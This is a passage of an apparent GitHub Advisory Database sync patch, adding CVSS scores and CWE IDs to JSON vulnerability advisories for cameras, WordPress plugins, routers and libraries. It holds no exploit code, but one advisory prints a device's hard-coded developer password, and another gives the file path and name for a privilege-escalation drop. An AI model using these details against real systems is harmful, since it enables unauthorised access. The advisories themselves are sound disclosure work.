vulnerability in Spencer Haws Link Whisper Free link-whisper allows Reflected XSS.This issue affects Link Whisper Free: from n/a through <= 0.9.0.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:34Z" From 8bd7c1f46419afedac4dba9e54177e6b9fc2d80c Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 21:32:40 +0000 Subject: [PATCH 55/77] Advisory Database Sync --- .../GHSA-56x4-vcv9-c6cw.json | 6 ++- .../GHSA-5p74-h2ww-pwhx.json | 6 ++- .../GHSA-g8pv-w9gq-24x8.json | 7 ++- .../GHSA-mrj4-3c4j-jh3r.json | 6 ++- .../GHSA-mx39-grv7-hq6w.json | 6 ++- .../GHSA-3f33-44xm-29m7.json | 4 +- .../GHSA-42h9-mr3g-6gc2.json | 15 ++++-- .../GHSA-438c-878c-qvmf.json | 15 ++++-- .../GHSA-4phc-m7h5-frwr.json | 44 ++++++++++++++++ .../GHSA-5fqg-ph33-v8fc.json | 40 ++++++++++++++ .../GHSA-5jj2-qhxw-rpq6.json | 37 +++++++++++++ .../GHSA-6235-7hp8-952p.json | 52 +++++++++++++++++++ .../GHSA-6v87-78cw-pw29.json | 11 ++-- .../GHSA-6x8c-24f7-p33h.json | 11 ++-- .../GHSA-744p-mq95-2m92.json | 11 ++-- .../GHSA-74m2-9pf8-f794.json | 6 ++- .../GHSA-75j9-8g79-fp7r.json | 44 ++++++++++++++++ .../GHSA-7mg3-vfc7-xvch.json | 40 ++++++++++++++ .../GHSA-8gq5-mm3m-7h4x.json | 11 ++-- .../GHSA-8p85-wjp4-3w4m.json | 15 ++++-- .../GHSA-8x43-j6j7-q6vg.json | 15 ++++-- .../GHSA-9636-r3rx-jw83.json | 6 ++- .../GHSA-c4qg-fgx5-7xg5.json | 15 ++++-- .../GHSA-cf6f-74jc-gm3q.json | 4 +- .../GHSA-f565-6pjw-3whr.json | 15 ++++-- .../GHSA-f8w4-9vp9-7v2q.json | 37 +++++++++++++ .../GHSA-fqqc-4836-hph4.json | 40 ++++++++++++++ .../GHSA-fqrw-hvqv-r58w.json | 15 ++++-- .../GHSA-h2mx-ppvp-v2rq.json | 15 ++++-- .../GHSA-h4x3-hcxh-84cx.json | 40 ++++++++++++++ .../GHSA-h93r-xq5m-hv3w.json | 15 ++++-- .../GHSA-jqhg-j5gv-hpmr.json | 33 ++++++++++++ .../GHSA-m6xw-mq4p-x7xv.json | 45 ++++++++++++++++ .../GHSA-p5gf-vhgm-432f.json | 11 ++-- .../GHSA-p884-v7p5-5858.json | 37 +++++++++++++ .../GHSA-p8m9-mjw8-hvvx.json | 3 +- .../GHSA-p9m7-fwrr-649p.json | 33 ++++++++++++ .../GHSA-pc7w-r272-4xgr.json | 48 +++++++++++++++++ .../GHSA-pfgm-6983-f589.json | 15 ++++-- .../GHSA-pfjc-cfqc-87f5.json | 48 +++++++++++++++++ .../GHSA-pp46-7w92-4xvf.json | 3 +- .../GHSA-q8wg-gw6g-8c93.json | 15 ++++-- .../GHSA-qg32-r7gw-fcxw.json | 52 +++++++++++++++++++ .../GHSA-qqj5-wp73-78fr.json | 11 ++-- .../GHSA-r222-jjm5-r49x.json | 31 +++++++++++ .../GHSA-r4m5-gc42-8vvh.json | 6 ++- .../GHSA-rp93-gq4p-8r62.json | 11 ++-- .../GHSA-vq94-wmm9-737m.json | 11 ++-- .../GHSA-w2hw-vq92-cm3x.json | 11 ++-- .../GHSA-wqcv-67x3-mx26.json | 11 ++-- .../GHSA-xf4f-qj26-72pf.json | 15 ++++-- 51 files changed, 964 insertions(+), 90 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-4phc-m7h5-frwr/GHSA-4phc-m7h5-frwr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5fqg-ph33-v8fc/GHSA-5fqg-ph33-v8fc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5jj2-qhxw-rpq6/GHSA-5jj2-qhxw-rpq6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6235-7hp8-952p/GHSA-6235-7hp8-952p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-75j9-8g79-fp7r/GHSA-75j9-8g79-fp7r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7mg3-vfc7-xvch/GHSA-7mg3-vfc7-xvch.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f8w4-9vp9-7v2q/GHSA-f8w4-9vp9-7v2q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fqqc-4836-hph4/GHSA-fqqc-4836-hph4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h4x3-hcxh-84cx/GHSA-h4x3-hcxh-84cx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jqhg-j5gv-hpmr/GHSA-jqhg-j5gv-hpmr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m6xw-mq4p-x7xv/GHSA-m6xw-mq4p-x7xv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p884-v7p5-5858/GHSA-p884-v7p5-5858.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p9m7-fwrr-649p/GHSA-p9m7-fwrr-649p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pc7w-r272-4xgr/GHSA-pc7w-r272-4xgr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pfjc-cfqc-87f5/GHSA-pfjc-cfqc-87f5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qg32-r7gw-fcxw/GHSA-qg32-r7gw-fcxw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r222-jjm5-r49x/GHSA-r222-jjm5-r49x.json diff --git a/advisories/unreviewed/2025/12/GHSA-56x4-vcv9-c6cw/GHSA-56x4-vcv9-c6cw.json b/advisories/unreviewed/2025/12/GHSA-56x4-vcv9-c6cw/GHSA-56x4-vcv9-c6cw.json index a0ca7187a4332..77b719f6b6382 100644 --- a/advisories/unreviewed/2025/12/GHSA-56x4-vcv9-c6cw/GHSA-56x4-vcv9-c6cw.json +++ b/advisories/unreviewed/2025/12/GHSA-56x4-vcv9-c6cw/GHSA-56x4-vcv9-c6cw.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-56x4-vcv9-c6cw", - "modified": "2025-12-09T21:31:49Z", + "modified": "2026-02-23T21:31:22Z", "published": "2025-12-09T21:31:49Z", "aliases": [ "CVE-2021-47729" ], "details": "Selea Targa IP OCR-ANPR Camera contains a stored cross-site scripting vulnerability in the 'files_list' parameter that allows attackers to inject malicious HTML and script code. Attackers can send a POST request to /cgi-bin/get_file.php with crafted payload to execute arbitrary scripts in victim's browser session.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/12/GHSA-5p74-h2ww-pwhx/GHSA-5p74-h2ww-pwhx.json b/advisories/unreviewed/2025/12/GHSA-5p74-h2ww-pwhx/GHSA-5p74-h2ww-pwhx.json index 8331c747fe4e7..a638e28366adb 100644 --- a/advisories/unreviewed/2025/12/GHSA-5p74-h2ww-pwhx/GHSA-5p74-h2ww-pwhx.json +++ b/advisories/unreviewed/2025/12/GHSA-5p74-h2ww-pwhx/GHSA-5p74-h2ww-pwhx.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5p74-h2ww-pwhx", - "modified": "2025-12-09T21:31:49Z", + "modified": "2026-02-23T21:31:22Z", "published": "2025-12-09T21:31:49Z", "aliases": [ "CVE-2021-47731" ], "details": "Selea Targa IP OCR-ANPR Camera contains a hard-coded developer password vulnerability that allows unauthorized configuration access through an undocumented page. Attackers can exploit the hidden endpoint by using the hard-coded password 'Selea781830' to enable configuration upload and overwrite device settings.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/12/GHSA-g8pv-w9gq-24x8/GHSA-g8pv-w9gq-24x8.json b/advisories/unreviewed/2025/12/GHSA-g8pv-w9gq-24x8/GHSA-g8pv-w9gq-24x8.json index ab5471840e3af..dd3266421ac24 100644 --- a/advisories/unreviewed/2025/12/GHSA-g8pv-w9gq-24x8/GHSA-g8pv-w9gq-24x8.json +++ b/advisories/unreviewed/2025/12/GHSA-g8pv-w9gq-24x8/GHSA-g8pv-w9gq-24x8.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-g8pv-w9gq-24x8", - "modified": "2025-12-09T21:31:49Z", + "modified": "2026-02-23T21:31:22Z", "published": "2025-12-09T21:31:48Z", "aliases": [ "CVE-2021-47730" ], "details": "Selea Targa IP OCR-ANPR Camera contains a cross-site request forgery vulnerability that allows attackers to create administrative users without authentication. Attackers can craft a malicious web page that submits a form to add a new admin user with full system privileges when a logged-in user visits the page.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" @@ -42,6 +46,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-352", "CWE-798" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2025/12/GHSA-mrj4-3c4j-jh3r/GHSA-mrj4-3c4j-jh3r.json b/advisories/unreviewed/2025/12/GHSA-mrj4-3c4j-jh3r/GHSA-mrj4-3c4j-jh3r.json index cf78534b4bc0a..02cba6773eb9d 100644 --- a/advisories/unreviewed/2025/12/GHSA-mrj4-3c4j-jh3r/GHSA-mrj4-3c4j-jh3r.json +++ b/advisories/unreviewed/2025/12/GHSA-mrj4-3c4j-jh3r/GHSA-mrj4-3c4j-jh3r.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mrj4-3c4j-jh3r", - "modified": "2025-12-09T21:31:49Z", + "modified": "2026-02-23T21:31:22Z", "published": "2025-12-09T21:31:48Z", "aliases": [ "CVE-2021-47727" ], "details": "Selea Targa IP OCR-ANPR Camera contains an unauthenticated vulnerability that allows remote attackers to access live video streams without authentication. Attackers can directly connect to RTP/RTSP or M-JPEG streams by requesting specific endpoints like p1.mjpg or p1.264 to view camera footage.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/12/GHSA-mx39-grv7-hq6w/GHSA-mx39-grv7-hq6w.json b/advisories/unreviewed/2025/12/GHSA-mx39-grv7-hq6w/GHSA-mx39-grv7-hq6w.json index f7c4ffd6af420..9576f6064124d 100644 --- a/advisories/unreviewed/2025/12/GHSA-mx39-grv7-hq6w/GHSA-mx39-grv7-hq6w.json +++ b/advisories/unreviewed/2025/12/GHSA-mx39-grv7-hq6w/GHSA-mx39-grv7-hq6w.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mx39-grv7-hq6w", - "modified": "2025-12-09T21:31:49Z", + "modified": "2026-02-23T21:31:22Z", "published": "2025-12-09T21:31:49Z", "aliases": [ "CVE-2021-47728" ], "details": "Selea Targa IP OCR-ANPR Camera contains an unauthenticated command injection vulnerability in utils.php that allows remote attackers to execute arbitrary shell commands. Attackers can exploit the 'addr' and 'port' parameters to inject commands and gain www-data user access through chained local file inclusion techniques.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-3f33-44xm-29m7/GHSA-3f33-44xm-29m7.json b/advisories/unreviewed/2026/02/GHSA-3f33-44xm-29m7/GHSA-3f33-44xm-29m7.json index b1ae3f23e9c00..dffc8fb573841 100644 --- a/advisories/unreviewed/2026/02/GHSA-3f33-44xm-29m7/GHSA-3f33-44xm-29m7.json +++ b/advisories/unreviewed/2026/02/GHSA-3f33-44xm-29m7/GHSA-3f33-44xm-29m7.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-200" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-42h9-mr3g-6gc2/GHSA-42h9-mr3g-6gc2.json b/advisories/unreviewed/2026/02/GHSA-42h9-mr3g-6gc2/GHSA-42h9-mr3g-6gc2.json index 2742fee72f225..e6a1524316992 100644 --- a/advisories/unreviewed/2026/02/GHSA-42h9-mr3g-6gc2/GHSA-42h9-mr3g-6gc2.json +++ b/advisories/unreviewed/2026/02/GHSA-42h9-mr3g-6gc2/GHSA-42h9-mr3g-6gc2.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-42h9-mr3g-6gc2", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-23T21:31:23Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-26721" ], "details": "An issue in Key Systems Inc Global Facilities Management Software v.20230721a allows a remote attacker to obtain sensitive information via the sid query parameter.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-598" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T17:25:55Z" diff --git a/advisories/unreviewed/2026/02/GHSA-438c-878c-qvmf/GHSA-438c-878c-qvmf.json b/advisories/unreviewed/2026/02/GHSA-438c-878c-qvmf/GHSA-438c-878c-qvmf.json index 22520aafcf059..bd33623c08239 100644 --- a/advisories/unreviewed/2026/02/GHSA-438c-878c-qvmf/GHSA-438c-878c-qvmf.json +++ b/advisories/unreviewed/2026/02/GHSA-438c-878c-qvmf/GHSA-438c-878c-qvmf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-438c-878c-qvmf", - "modified": "2026-02-23T15:31:15Z", + "modified": "2026-02-23T21:31:26Z", "published": "2026-02-23T15:31:15Z", "aliases": [ "CVE-2025-69700" ], "details": "Tenda FH1203 V2.0.1.6 contains a stack-based buffer overflow vulnerability in the modify_add_client_prio function, which is reachable via the formSetClientPrio CGI handler.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-23T14:16:21Z" diff --git a/advisories/unreviewed/2026/02/GHSA-4phc-m7h5-frwr/GHSA-4phc-m7h5-frwr.json b/advisories/unreviewed/2026/02/GHSA-4phc-m7h5-frwr/GHSA-4phc-m7h5-frwr.json new file mode 100644 index 0000000000000..5b83eed52a118 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4phc-m7h5-frwr/GHSA-4phc-m7h5-frwr.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4phc-m7h5-frwr", + "modified": "2026-02-23T21:31:27Z", + "published": "2026-02-23T21:31:26Z", + "aliases": [ + "CVE-2025-61147" + ], + "details": "strukturag libde265 commit d9fea9d wa discovered to contain a segmentation fault via the component decoder_context::compute_framedrop_table().", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61147" + }, + { + "type": "WEB", + "url": "https://github.com/strukturag/libde265/issues/484" + }, + { + "type": "WEB", + "url": "https://github.com/strukturag/libde265/commit/8b17e0930f77db07f55e0b89399a8f054ddbecf7" + }, + { + "type": "WEB", + "url": "https://gist.github.com/optionGo/e6567a1c2bc4e0c9fee4e1e8be8d6af9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T20:28:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5fqg-ph33-v8fc/GHSA-5fqg-ph33-v8fc.json b/advisories/unreviewed/2026/02/GHSA-5fqg-ph33-v8fc/GHSA-5fqg-ph33-v8fc.json new file mode 100644 index 0000000000000..d0d0ee3e3688d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5fqg-ph33-v8fc/GHSA-5fqg-ph33-v8fc.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5fqg-ph33-v8fc", + "modified": "2026-02-23T21:31:27Z", + "published": "2026-02-23T21:31:27Z", + "aliases": [ + "CVE-2025-63945" + ], + "details": "A privilege escalation (PE) vulnerability in the Tencent iOA app thru 210.9.28693.621001 on Windows devices enables a local user to execute programs with elevated privileges. However, execution requires that the local user is able to successfully exploit a race condition.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-63945" + }, + { + "type": "WEB", + "url": "https://github.com/alexlee820/CVE-2025-63945-Tencent-iOA-EoP" + }, + { + "type": "WEB", + "url": "https://github.com/alexlee820/Tencent-iOA-EoP" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-59" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T20:28:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5jj2-qhxw-rpq6/GHSA-5jj2-qhxw-rpq6.json b/advisories/unreviewed/2026/02/GHSA-5jj2-qhxw-rpq6/GHSA-5jj2-qhxw-rpq6.json new file mode 100644 index 0000000000000..545cbc6e1ac54 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5jj2-qhxw-rpq6/GHSA-5jj2-qhxw-rpq6.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5jj2-qhxw-rpq6", + "modified": "2026-02-23T21:31:26Z", + "published": "2026-02-23T21:31:26Z", + "aliases": [ + "CVE-2025-61145" + ], + "details": "libtiff up to v4.7.1 was discovered to contain a double free via the component tools/tiffcrop.c.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61145" + }, + { + "type": "WEB", + "url": "https://gist.github.com/optionGo/062f109569196dbffd8ac12020b42289" + }, + { + "type": "WEB", + "url": "https://gitlab.com/libtiff/libtiff/-/issues/736" + }, + { + "type": "WEB", + "url": "https://gitlab.com/libtiff/libtiff/-/merge_requests/753" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T19:22:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6235-7hp8-952p/GHSA-6235-7hp8-952p.json b/advisories/unreviewed/2026/02/GHSA-6235-7hp8-952p/GHSA-6235-7hp8-952p.json new file mode 100644 index 0000000000000..0a4cdbe49db4a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6235-7hp8-952p/GHSA-6235-7hp8-952p.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6235-7hp8-952p", + "modified": "2026-02-23T21:31:28Z", + "published": "2026-02-23T21:31:28Z", + "aliases": [ + "CVE-2026-3026" + ], + "details": "A vulnerability has been found in erzhongxmu JEEWMS 3.7. Affected by this issue is some unknown functionality of the file /plug-in/ueditor/jsp/getRemoteImage.jsp of the component UEditor. The manipulation of the argument upfile leads to server-side request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3026" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347382" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347382" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756522" + }, + { + "type": "WEB", + "url": "https://www.notion.so/JEEWMS-SSRF-Vulnerability-in-UEditor-Module-304ea92a3c41806782b1f7285ab0d580" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T21:19:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6v87-78cw-pw29/GHSA-6v87-78cw-pw29.json b/advisories/unreviewed/2026/02/GHSA-6v87-78cw-pw29/GHSA-6v87-78cw-pw29.json index e91bfff082e87..fe7018310d739 100644 --- a/advisories/unreviewed/2026/02/GHSA-6v87-78cw-pw29/GHSA-6v87-78cw-pw29.json +++ b/advisories/unreviewed/2026/02/GHSA-6v87-78cw-pw29/GHSA-6v87-78cw-pw29.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-6v87-78cw-pw29", - "modified": "2026-02-20T18:31:38Z", + "modified": "2026-02-23T21:31:23Z", "published": "2026-02-20T18:31:38Z", "aliases": [ "CVE-2026-22351" ], "details": "Missing Authorization vulnerability in Marcus (aka @msykes) WP FullCalendar wp-fullcalendar allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP FullCalendar: from n/a through <= 1.6.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:34Z" diff --git a/advisories/unreviewed/2026/02/GHSA-6x8c-24f7-p33h/GHSA-6x8c-24f7-p33h.json b/advisories/unreviewed/2026/02/GHSA-6x8c-24f7-p33h/GHSA-6x8c-24f7-p33h.json index 277e3a41fc38d..e8bac2532749c 100644 --- a/advisories/unreviewed/2026/02/GHSA-6x8c-24f7-p33h/GHSA-6x8c-24f7-p33h.json +++ b/advisories/unreviewed/2026/02/GHSA-6x8c-24f7-p33h/GHSA-6x8c-24f7-p33h.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-6x8c-24f7-p33h", - "modified": "2026-02-19T18:31:54Z", + "modified": "2026-02-23T21:31:22Z", "published": "2026-02-19T18:31:54Z", "aliases": [ "CVE-2025-15561" ], "details": "An attacker can exploit the update behavior of the WorkTime monitoring daemon to elevate privileges on the local system to NT Authority\\SYSTEM. A malicious executable must be named  WTWatch.exe and dropped in the C:\\ProgramData\\wta\\ClientExe directory, which is writable by \"Everyone\". The executable will then be run by the WorkTime monitoring daemon.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-269" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T11:15:56Z" diff --git a/advisories/unreviewed/2026/02/GHSA-744p-mq95-2m92/GHSA-744p-mq95-2m92.json b/advisories/unreviewed/2026/02/GHSA-744p-mq95-2m92/GHSA-744p-mq95-2m92.json index 091aa4689286b..e94df78e83641 100644 --- a/advisories/unreviewed/2026/02/GHSA-744p-mq95-2m92/GHSA-744p-mq95-2m92.json +++ b/advisories/unreviewed/2026/02/GHSA-744p-mq95-2m92/GHSA-744p-mq95-2m92.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-744p-mq95-2m92", - "modified": "2026-02-23T18:32:02Z", + "modified": "2026-02-23T21:31:26Z", "published": "2026-02-23T18:32:02Z", "aliases": [ "CVE-2026-26464" ], "details": "Stored Cross-Site Scripting (XSS) was found in the /admin/edit_user.php page of Society Management System Portal V1.0, which allows remote attackers to inject and store arbitrary JavaScript code that is executed in users' browsers. This vulnerability can be exploited via the name parameter in a POST HTTP request, leading to execution of malicious scripts when the affected content is viewed by other users, including administrators.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -21,7 +26,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-23T18:25:51Z" diff --git a/advisories/unreviewed/2026/02/GHSA-74m2-9pf8-f794/GHSA-74m2-9pf8-f794.json b/advisories/unreviewed/2026/02/GHSA-74m2-9pf8-f794/GHSA-74m2-9pf8-f794.json index bcaa9512d2aef..487cde5b35df5 100644 --- a/advisories/unreviewed/2026/02/GHSA-74m2-9pf8-f794/GHSA-74m2-9pf8-f794.json +++ b/advisories/unreviewed/2026/02/GHSA-74m2-9pf8-f794/GHSA-74m2-9pf8-f794.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-74m2-9pf8-f794", - "modified": "2026-02-19T18:31:54Z", + "modified": "2026-02-23T21:31:22Z", "published": "2026-02-19T18:31:54Z", "aliases": [ "CVE-2026-2735" ], "details": "Stored Cross-Site Scripting (XSS) in Alkacon's OpenCms v18.0, which occurs when user input is not properly validated when sending a POST request to ‘/blog/new-article/org.opencms.ugc.CmsUgcEditService.gwt’ using the ‘text’ parameter.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-75j9-8g79-fp7r/GHSA-75j9-8g79-fp7r.json b/advisories/unreviewed/2026/02/GHSA-75j9-8g79-fp7r/GHSA-75j9-8g79-fp7r.json new file mode 100644 index 0000000000000..2766a5156fa8b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-75j9-8g79-fp7r/GHSA-75j9-8g79-fp7r.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + 